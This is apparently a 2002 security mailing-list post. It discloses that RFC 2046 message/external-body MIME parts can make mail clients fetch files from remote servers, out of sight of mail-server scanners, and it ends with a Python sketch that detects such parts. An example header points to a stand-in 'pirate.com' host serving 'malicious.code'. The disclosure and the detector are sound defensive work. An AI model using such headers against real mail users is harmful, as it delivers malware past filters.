Hi,

Some days ago, we were talking about the RFC 2046 message fragmentation vulnerability. There is another related RFC 2046 vulnerability: the message/external-body message type.

The RFC 2046 message/external-body MIME type allows sending messages not by their content, but by reference. In this case, you can send a message with the following MIME tag:

    Content-Type: message/external-body;
                  name="malicious.code";
                  site="pirate.com";
                  mode="image";
                  access-type=ANON-FTP;
                  directory="pub"

The client MUA receives this and will get the "malicious.code" file by anonymous ftp from the pirate.com ftp server.

RFC 2046 defines five access-types: "FTP", "ANON-FTP", "TFTP", "LOCAL-FILE", and "MAIL-SERVER".

There are some other optional parameters to this feature. For example, if the message includes the parameter permission="write", an existing file will be overwritten.

RFC 2046 says something about security in paragraph 5.2.3.6:

> (1) Accessing data via a "message/external-body" reference
>     effectively results in the message recipient performing
>     an operation that was specified by the message
>     originator. It is therefore possible for the message
>     originator to trick a recipient into doing something
>     they would not have done otherwise.

...

Combining different access-types (mainly anon-ftp, mail-server and local-file) can create, IMHO, more complex attacks.

What's interesting is that in this case the message and the malicious code pass through two different network paths: the message is sent by mail and the malicious code will be retrieved by the receiver by anonymous ftp. In the case of the previous vulnerability (fragmented message), the message and the malicious code use the same network path.

Classical mail server virus scanners will never see the malicious code pass through them, as they will never have the entire malicious code available. The only way to detect it, IMHO, at the mail server, is by lexical analysis of MIME tags.

Netscape Communicator 4.79 is compatible with this RFC 2046 feature. I can't say anything about other mail clients, as I'm sick at home and I have no access to other MUAs.

Attached to this message you'll find a message sent using this feature and allowing you to get RFC 2046 by anonymous ftp. Maybe someone can check it out with Outlook and other popular MUAs. It's in the /var/mail format: you can append it to your mailbox and try it... 8-)

References:

RFC 2046 - MIME - Media Types

Jose Marcio

--
-------------------------------------------------------------------
Jose Marcio MARTINS DA CRUZ
Ecole Nationale Superieure des Mines de Paris
Centre de Calcul
Tel . : 01.40.51.93.41
60, bd Saint Michel
http://www.ensmp.fr/~martins
75272 - PARIS CEDEX 06
mailto:martins@cc.ensmp.fr

From martins@didi.ensmp.fr Wed Sep 18 10:40:02 2002
Return-Path: <martins@ensmp.fr>
Received: from didi.ensmp.fr (didi [10.5.5.101])
        by ticrobe.ensmp.fr (8.12.4/8.12.2/JMMC) with ESMTP id g8I8dLCi003339
        for <tijojo@adrian.ensmp.fr>; Wed, 18 Sep 2002 10:40:02 +0200
Sender: martins@paris.ensmp.fr
Message-ID: <3D88395A.AE13841F@didi.ensmp.fr>
Date: Wed, 18 Sep 2002 10:29:14 +0200
From: Jose Martins <martins@didi.ensmp.fr>
Reply-To: tijojo@paris.ensmp.fr
X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-3 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: tijojo@adrian.ensmp.fr
Subject: tst attachment
Content-Type: multipart/mixed;
 boundary="------------FA43411C8E35AC7F655DA077"
X-Miltered: at ticrobe by Joe's j-chkmail ("http://j-chkmail.ensmp.fr")!
Status: RO

This is a multi-part message in MIME format.
--------------FA43411C8E35AC7F655DA077
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

RFC 2046 message/external-body compatibility test

--------------FA43411C8E35AC7F655DA077
Content-Type: message/external-body;
 name="rfc2046.Z";
 site="ftp.inria.fr";
 mode="image";
 access-type=ANON-FTP;
 directory="rfc/rfc20xx"

--------------FA43411C8E35AC7F655DA077--
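
The mail-server check the post calls for (lexical analysis of MIME tags), sketched as an added example that is not part of the original post or of j-chkmail. The function names, the finding fields and the sample message with its example.org hosts are constructed for illustration.

```python
import email
from email import policy, utils

# The five access-types RFC 2046 defines, as listed in the post.
RFC2046_ACCESS_TYPES = {"ftp", "anon-ftp", "tftp", "local-file", "mail-server"}

# Constructed sample modelled on the post's test message; hosts are placeholders.
SAMPLE = b"""\
From: sender@example.org
To: rcpt@example.org
Subject: tst attachment
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XX"

--XX
Content-Type: text/plain; charset=us-ascii

RFC 2046 message/external-body compatibility test
--XX
Content-Type: message/external-body; name="rfc2046.Z";
 site="ftp.example.org"; mode="image";
 access-type=ANON-FTP; directory="rfc/rfc20xx"

--XX--
"""

def _param(part, key):
    """Fetch one Content-Type parameter, decoding RFC 2231 forms if present."""
    value = part.get_param(key)
    return None if value is None else utils.collapse_rfc2231_value(value)

def find_external_bodies(raw):
    """Return one finding per message/external-body part found in raw bytes."""
    findings = []
    msg = email.message_from_bytes(raw, policy=policy.compat32)
    for part in msg.walk():  # walk() also reaches parts nested in multiparts
        if part.get_content_type() != "message/external-body":
            continue
        access = (_param(part, "access-type") or "").lower()
        findings.append({
            "access_type": access,
            "known_access_type": access in RFC2046_ACCESS_TYPES,
            "site": _param(part, "site"),
            "name": _param(part, "name"),
            # The post notes that a write permission lets an existing file be overwritten.
            "overwrite": "write" in (_param(part, "permission") or "").lower(),
        })
    return findings

if __name__ == "__main__":
    for finding in find_external_bodies(SAMPLE):
        print(finding)
```

A filter built on this can quarantine or strip any part it reports, since the referenced content itself never passes through the mail server for scanning.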